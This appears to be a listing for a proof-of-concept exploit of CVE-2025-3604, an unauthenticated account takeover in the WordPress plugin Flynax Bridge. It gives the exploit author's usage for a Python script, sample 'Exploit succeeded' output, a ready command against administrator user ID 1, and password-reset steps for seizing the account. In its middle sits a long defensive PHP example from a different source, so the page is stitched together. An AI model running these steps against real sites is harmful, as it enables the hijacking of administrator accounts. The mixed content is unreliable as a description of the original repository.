
POC details: a5a79738b8543eccf9980496da821558c81f9f8c

Source
Related vulnerability
Title: WordPress plugin Flynax Bridge security vulnerability (CVE-2025-3604)
Description: WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed in PHP that lets users host a personal blog on a server running PHP and MySQL. WordPress plugin is an application plug-in. WordPress plugin Flynax Bridge 2.2.0 and earlier versions contain a security vulnerability: the plugin fails to properly verify a user's identity, which may lead to account takeover and privilege escalation.
Description
Flynax Bridge <= 2.2.0 - Unauthenticated Privilege Escalation via Account Takeover
Introduction

# 🚨 Flynax Bridge <= 2.2.0 - Unauthenticated Privilege Escalation via Account Takeover

## 📄 Description

The **Flynax Bridge** plugin for WordPress is vulnerable to **privilege escalation via account takeover** in all versions up to, and including, `2.2.0`.

This is due to the plugin not properly validating a user's identity prior to updating their account details (such as email). As a result, **unauthenticated attackers** can change the email address of **any user**, including **administrators**, and then initiate a **password reset** to fully take over the account.

> **CVE**: CVE-2025-3604  
> **CVSS**: 9.8 (Critical)  
> **Published**: April 23, 2025  
> **Last Updated**: April 24, 2025
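The root cause described above is an account-update path that never checks who is asking. The following is an added illustrative example, not Flynax Bridge's code and not the page's own script: a WordPress AJAX handler that changes a user's email only after authentication, authorization and CSRF checks. The action name `example_update_email` and the request fields `user_id`, `email` and `nonce` are assumptions; the WordPress functions used are core APIs.

```php
<?php
// Added illustrative example (not Flynax Bridge's code). The hook name and the
// POST field names below are assumptions; the API calls are WordPress core.

// Registered only for authenticated requests: there is deliberately no
// matching 'wp_ajax_nopriv_example_update_email' hook, so anonymous callers
// never reach this handler at all.
add_action( 'wp_ajax_example_update_email', 'example_update_email' );

function example_update_email() {
    // 1. CSRF: the request must carry a nonce issued for this specific action.
    check_ajax_referer( 'example_update_email', 'nonce' );

    // 2. Authentication: a logged-in user must be behind the request.
    if ( ! is_user_logged_in() ) {
        wp_send_json_error( 'Authentication required.', 401 );
    }

    // 3. Authorization: callers may change their own address, or someone
    //    else's only if they hold the edit_user meta capability for that user
    //    (administrators do; subscribers do not).
    $target_id  = isset( $_POST['user_id'] ) ? absint( $_POST['user_id'] ) : 0;
    $current_id = get_current_user_id();
    if ( 0 === $target_id
        || ( $target_id !== $current_id && ! current_user_can( 'edit_user', $target_id ) ) ) {
        wp_send_json_error( 'You may not modify this account.', 403 );
    }

    // 4. Input validation: well-formed, and not already bound to another account.
    $new_email = isset( $_POST['email'] ) ? sanitize_email( wp_unslash( $_POST['email'] ) ) : '';
    $existing  = email_exists( $new_email ); // user ID or false
    if ( ! is_email( $new_email ) || ( $existing && $existing !== $target_id ) ) {
        wp_send_json_error( 'Invalid or already-registered email.', 400 );
    }

    // 5. Apply the change through the core API so normal hooks and
    //    notifications fire.
    $result = wp_update_user( array( 'ID' => $target_id, 'user_email' => $new_email ) );
    if ( is_wp_error( $result ) ) {
        wp_send_json_error( $result->get_error_message(), 500 );
    }

    wp_send_json_success( array( 'user_id' => $target_id ) );
}
```

The three checks that the vulnerable behaviour lacks are the ones that matter here: no `nopriv` hook (unauthenticated requests are rejected before any code runs), a nonce (a logged-in user cannot be tricked into submitting the change), and a per-target capability check (a low-privilege account cannot point an administrator's email at an address it controls). Because the update goes through `wp_update_user`, core also mails an email-change notice to the previous address unless a site disables it via the `send_email_change_email` filter; on a site running an affected version, an unexpected notice of that kind to an administrator is a worthwhile signal to investigate.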

---

## ⚙️ Script Output Example

```
Detected plugin version: 2.2.0
Version is vulnerable. Attempting exploit...
Exploit succeeded! Email changed to: user@admin.sa
Exploit By Nxploited (Khaled_alenazi) | https://github.com/Nxploited
```

After successful exploitation, the attacker can go to the WordPress login page and click on **"Lost your password?"** using the **newly set email** to reset the password and gain full access to the targeted account.

---

## 🚀 Usage

```
usage: CVE-2025-3604.py [-h] -u URL [-mail NEWMAIL] -id USER_ID

WordPress Flynax Bridge Unauthenticated Privilege Escalation via Account # By Nxploited (Khaled Alenazi)

options:
  -h, --help              show this help message and exit
  -u, --url URL           Target URL
  -mail, --newmail NEWMAIL
                          New email to set
  -id, --user_id USER_ID  User ID to exploit
```

---

## 🧪 Example

```
python3 CVE-2025-3604.py -u "http://TARGET/wordpress/" -id "1" -mail "attack@attacker.com"
```

### Explanation:

- `-u`: Base URL of the WordPress site.
- `-id`: ID of the user to target (typically 1 for admin).
- `-mail`: New email that will be set for that user.

---
## ⚠️ Disclaimer
Use at your own risk. For authorized testing and educational purposes only.

### 🧑‍💻
*BY: Nxploited ( Khaled_alenazi )*
File snapshot

```
[4.0K] /data/pocs/a5a79738b8543eccf9980496da821558c81f9f8c
├── [3.4K] CVE-2025-3604.py
├── [1.1K] LICENSE
└── [2.0K] README.md

0 directories, 3 files
```